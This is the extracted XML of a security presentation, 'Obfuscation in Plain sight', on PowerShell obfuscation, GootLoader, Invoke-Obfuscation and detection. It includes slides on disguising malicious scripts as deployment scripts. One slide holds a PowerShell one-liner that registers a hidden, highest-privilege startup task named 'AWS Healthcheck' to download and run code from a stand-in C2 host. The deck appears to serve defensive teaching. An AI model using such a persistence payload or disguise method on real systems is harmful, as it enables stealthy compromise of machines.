          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728547" y="1527717"/>
            <a:ext cx="1054905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$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TaskName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= "AWS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Healthcheck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"; $URI = "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http://thisismyhackerc2/hax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"; Register-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ScheduledTask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TaskName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TaskName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-Trigger (New-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ScheduledTaskTrigger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AtStartup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 -Action (New-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ScheduledTaskAction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-Execute "powershell.exe" -Argument "-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NoProfile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WindowStyle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Hidden -Command `"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iex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(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iwr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'$URI')`"") -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RunLevel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Highest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5FC2292-7B0C-AAC1-A8B3-0A21B95BE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" y="3252455"/>
            <a:ext cx="8290560" cy="29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339724"/>
            <a:ext cx="50292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That’s all folks!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/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EDC3D05-B1DF-3E7C-6A80-BB95E1236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575511"/>
            <a:ext cx="502920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A9C41-0BB9-B318-8DB9-3C67AC29F783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="463897"/>
            <a:ext cx="495299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QR-Link to GitHub Repo &amp; PowerPoint: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CC82DF-BA7D-890A-660E-6E10E1B76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636" y="1575511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5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0C054F-5224-204B-D8CB-1E8EB0FBD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3300" y="2113410"/>
            <a:ext cx="4955968" cy="3994464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What is Obfuscation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Real World Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Invoke Obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Detection Strategies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Leveraging Alert Fatigue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Creating Non-Malicious looking Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Difficulty of Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Creating Fake Deployment Scripts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93E1F6-198A-E9BB-02CB-43E4CDA13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9342" y="237547"/>
            <a:ext cx="4179888" cy="171450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53505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Obfuscation?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C72B7F-E586-E0DA-2A59-AFD443DA91AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="2529582"/>
            <a:ext cx="10515599" cy="396329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“O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1D5DB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>bfuscation refers to the practice of intentionally hiding the true purpose and functionality of code in order to evade detection and analysis by security researchers and cybersecurity defenses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” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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– ChatGPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone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 D V A N C E D E V A S I O N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2613"/>
            <a:ext cx="10515600" cy="132556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Real World Threats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6F4C-D0A7-7DCB-2312-F046D4A08560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993569" y="899745"/>
            <a:ext cx="1020486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GOOTLOADER infections begin with the user searching for business-related documents online, like templates, agreements, or contracts. The victim is lured into visiting a compromised website and downloading a malicious archive that contains a JavaScript file known as GOOTLOADER.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Successful execution of the GOOTLOADER file will download additional payloads.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012A4-4AE0-9B7C-B37A-35F794748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" b="29970"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="728794" y="2377073"/>
            <a:ext cx="10734412" cy="44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Real World Threats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6F4C-D0A7-7DCB-2312-F046D4A08560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923023" y="1927085"/>
            <a:ext cx="331819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the malicious payload stripped out of the legitimate JavaScript library, still heavily obfuscated.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Mandiant recently published an updated GootLoader Bootcamp with tools to dissect the current trending GootLoader payloads.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6A960-0293-89FA-AB5D-3F03FF436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2359" b="1404"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412217" y="1520606"/>
            <a:ext cx="7301247" cy="507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Real World Threats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96F4C-D0A7-7DCB-2312-F046D4A08560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1148938" y="1324928"/>
            <a:ext cx="1020486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CBDFB-0788-AAB4-3C0B-ED023DC35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90" b="61333"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2262010"/>
            <a:ext cx="10885461" cy="3920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CF16D-BF06-929C-6CA7-1B72792374B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301338" y="1477328"/>
            <a:ext cx="102048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first stage executes and pulls down this obfuscated PowerShell script and loads it into memory as a hidden PowerShell process staging for further C2.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43465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23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Invoke-Obfuscation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ED565-CCFD-9706-5CBB-C1BBE5ACA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8" t="6330" r="9931" b="2186"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4301365" y="1417111"/>
            <a:ext cx="7484212" cy="4125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3433E-FED7-96C5-7E64-D96F135BEC6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290573" y="2048767"/>
            <a:ext cx="401079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Invoke-Obfuscation is a mainstream and popular obfuscation tool that can be used with PowerShell and scripts.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Senior analysts and threat hunters should create detections and monitor for activities associated with this tool and others like it. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358695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ABE42931-9A94-8E72-7A69-87BF6579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51" y="0"/>
            <a:ext cx="122194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9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{A1EB8432-F5FB-43D6-9B7C-00A0FD34204A}tf67328976_win32</Template>
  <TotalTime>717</TotalTime>
  <Words>1059</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>159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Söhne</vt:lpstr>
      <vt:lpstr>Tenorite</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Obfuscation in Plain sight</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>What Is Obfuscation?</vt:lpstr>
      <vt:lpstr>Real World Threats</vt:lpstr>
      <vt:lpstr>Real World Threats</vt:lpstr>
      <vt:lpstr>Real World Threats</vt:lpstr>
      <vt:lpstr>Invoke-Obfuscation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Invoke Obfuscation</vt:lpstr>
      <vt:lpstr>Detection Strategies for Normal Obfuscation</vt:lpstr>
      <vt:lpstr>Leveraging Alert Fatigue</vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts</vt:lpstr>
      <vt:lpstr>Difficulty of Detection</vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Hidden Payload </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Parser Function </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Obfuscated Parser Function </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Parser Function Comparison </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Decryption Function </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Obfuscated Decryption Function </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Decryption Function Comparison </vt:lpstr>
      <vt:lpstr>Creating Fake Deployment Scripts Execution Function </vt:lpstr>
      <vt:lpstr>Creating Fake Deployment Scripts Obfuscated Execution Function </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Execution Function Comparison </vt:lpstr>
      <vt:lpstr>Creating Non-Malicious looking Scripts Putting it all together! </vt:lpstr>
      <vt:lpstr>That’s all folks!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Jonathan Chaipis</dc:creator>
  <cp:lastModifiedBy>Edward Sabijon</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-27T02:26:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-09T16:36:12Z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